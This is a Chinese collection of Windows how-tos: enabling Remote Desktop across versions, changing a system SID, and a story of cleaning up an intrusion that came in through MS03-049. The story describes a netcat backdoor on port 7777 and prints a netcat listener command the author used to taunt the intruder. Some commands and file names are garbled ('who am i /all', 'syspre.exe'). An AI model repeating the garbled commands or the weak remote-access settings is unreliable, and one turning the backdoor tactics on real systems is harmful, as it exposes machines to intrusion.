正如上文提到的，WINDOWS2000引入远程桌面连接功能后受到了广大用户的好评，大家普遍认为开启该功能的方法太复杂，而且在使用时不能保证每个人都拥有WINDOWS2000SERVER光盘。因此在XP和2003系统中微软将远程桌面开启的操作进行了简化。

第一步：在桌面“我的电脑”上点鼠标右键，选择“属性”。

第二步：在弹出的系统属性窗口中选择“远程”标签，

第三步：在远程标签中找到“远程桌面”，在“容许用户连接到这台计算机”前打上对勾后确定即可完成XP下远程桌面连接功能的启用。

(3)WINDOWS 2003

WINDOWS2003开启方法和XP类似，同样对操作步骤进行了简化。方法如下：

第一步：在桌面“我的电脑”上点鼠标右键，选择“属性”。

第二步：在弹出的系统属性窗口中选择“远程”标签。

第三步：在远程标签中找到“远程桌面”，在“容许用户连接到这台计算机”前打上对勾后确定即可完成2003下远程桌面连接功能的启用。

(4) WINDOWS VISTA

依次点击“控制面板” — “系统与维护” — “系统”或直接在桌面“计算机”图标上单击右键选择“属性”打开管理界面，在右侧的任务列表中选择“远程设置”，即会弹出相应的设置页。如果是从另一台同样运行Windows Vista的客户机远程连接本系统，可使用最下方的“只允许运行带网络级身份验证的远程桌面的计算机连接”选项，这能够提供更强的安全性；而如果希望从运行Windows 2000/XP客户机连接本系统，则只能使用“允许运行任意版本远程桌面的计算机连接”，当然，这会带来一定的风险。

(5) WINDOWS 7

第一步：在远程计算机上进行远程桌面的设置。单击“计算机”图标选择“属性”命令，在打开的“系统”窗口点击“远程设置” 链接，弹出的“系统属性”的“远程”选项窗口中选择“允许运行任意版本远程桌面的计算机连接”，这样就开通了远程桌面功能。接着，进入 “控制面板-用户账户和家庭安全”功能，给用来登录远程桌面的账户设置密码。

第二步：在远程计算机设置完毕，就可以在本地机尝试连接远程桌面了。点击“开始-所有程序-附件-远程桌面连接”命令，在打开“远程桌面”窗口输入远程计算机名后点击“连接”按钮;这时会弹出“Windows安全”窗口需要输入密码，输入完密码勾选“记住我的凭据”选项后确定即可在下次连接时自动登录远程桌面。

篇19：Windows系统sid修改方法

一、Sid的含义

Sid全称为security identity，即网络安全标示，它用来唯一标示计算机账户、用户组和用户账户这些信息。他由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。许多系统软件使用此标示来唯一识别一个用户。

二、查看本机sid

1)cmd进入命令行，输入who am i /all.即可查看当前登录用户的sid信息

2)Regedit进入注册表，进入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion \ProfileList ，其左侧为sid，右侧ProfileImagePath 可查看该sid对应的用户名，

三、修改sid

在虚拟上克隆系统，或者使用ghost镜像安装系统时会遇到sid相同的问题。这种情况下:

若是win2003或win xp系统，则可以在安装包的support\tools\文件下，提取DEPLOY.CAB中的syspre.exe和factory.exe两个文件。然后运行syspre.exe，选择重新封装即可。

若是win7系统，则可以在一下路径C:\Windows\System32\sysprep中运行syspre.exe。选择重新封装即可。

篇20：菜鸟防黑:如何全面抵制攻击Windows系统

? 前段时间由于我表弟要学ASP，所以我去把他的操作系统换成了Windows2000高级服务器版（SP4）。他兴奋地对我说以后要写一个比动网还好的论坛。可惜好景不长，两周过后他打来电话向我求救，说是中病毒了。

发现

我火速赶到表弟家一看，那些“病毒”文件无一例外都存放在D:winntsystem32hack下，有nc.exe、opente.net.exe等。明显这些不是病毒，而是工具，表弟的电脑被入侵了。

开工了！凭着玩网络安全两年多的经验，我进入了D:Documents and settings，发现除了表弟使用的Administrator用户和默认的ALL USERS文件夹之外，还多出了一个Justme文件夹。这类都是先给系统添加一个合法用户，再打开服务器的终端服务登入，最后把这些服务器作为跳板来入侵别人的。于是，我打开services.msc，发现服务中果然多了一个Terminal Services。

? 拒绝

从服务器管理中删除这个Justme用户后，我开始查找可能留下的后门。运行cmd.exe并输入netstat -an，发现在一些正常的端口中多出了一个7777端口（如图1）。这个端口看起来非常可疑，我用TELNET去连接它，返回了一个指向D:winntsystem32hack的路径，并且随意输入一个命令它都能够正确执行。看来这的确是留下的一个后门，那它使用的是哪个程序呢？下面我要查看系统的进程，

在进程管理中，我看到了一个十分不愿意看到的进程――svchosts.exe。它无法手工结束，每次结束的操作都会弹出一个拒绝访问的提示框。看来是我目前的权限不够，那么这个比Administrators权限还要高的进程一定是以System权限运行的。当我再次打开service.msc时，发现一个叫Kent的服务，所执行的文件就是这个svchosts.exe。于是我马上终止了这个服务，并找工具删除了它。就这样，可恶的进程和它的7777端口一起消失了。我再仔细地通查了注册表和服务的DLL，直到确定全部安全为止。

这个是怎么进来的呢？我看了看表弟安装过的安全补丁，发现只有微软MS-03049号安全公告中的补丁未打上，并且Windows事件查看器里也有WORKSTATION服务异常的记录。这下可以确定是通过MS-03049的安全漏洞进入了表弟的电脑。接下来的事情就是打补丁，安装并开启防火墙。

? 骚扰

本来事情到此就结束了，可是表弟捏紧拳头对我说：“这太可恶了，你一定要帮我抓他杀了出气！”我顿时Crazy Faint。唉，现在的小家伙！最后我决定只轻轻地警告这个。

我从hack文件夹里复制了nc.exe到C盘，然后把其他文件删除。运行cmd.exe后，我笑着对表弟说耍猴开始了。

我在C:下新建了一个文本文件haha.txt，写上一些话后保存（如下图）。在cmd窗口中输入“c:nc.exe -vv -L -p 7777 < c:haha.txt”，看到屏幕显示了“listening on [any] 7777 ...”后就招呼表弟过来一起玩游戏，而把这个cmd窗口放在那里，只时不时地注意一下动静。这是因为，一旦发现失去了这台电脑的控制权，就会利用他所布置的后门再次入侵。我就是利用了他的这个心理，准备给他一个深刻的“回忆”。

大约两小时过后，我和表弟看到这个cmd窗口中出现了动静――鱼儿上钩了！各位读者想想在那边会出现什么情景？他的连接窗口中会出现我刚才在haha.txt中写的话，足足能让他气上半天的。哈哈，真是痛快！我们不仅得到了他的主机名和IP，还消遣了他一通。

最后，我这边的电脑屏幕上出现了来自的回话（如上图）。看得出来，这位正郁闷着！

原文转自：www.ltesting.net

★linux下修改系统时间方法介绍linux操作系统

★Windows 7系统70个小技巧

★关于T3的问题Windows系统

★windows系统客户机管理的安全策略

★中关村win7 64位系统下更改用户账户名称的方法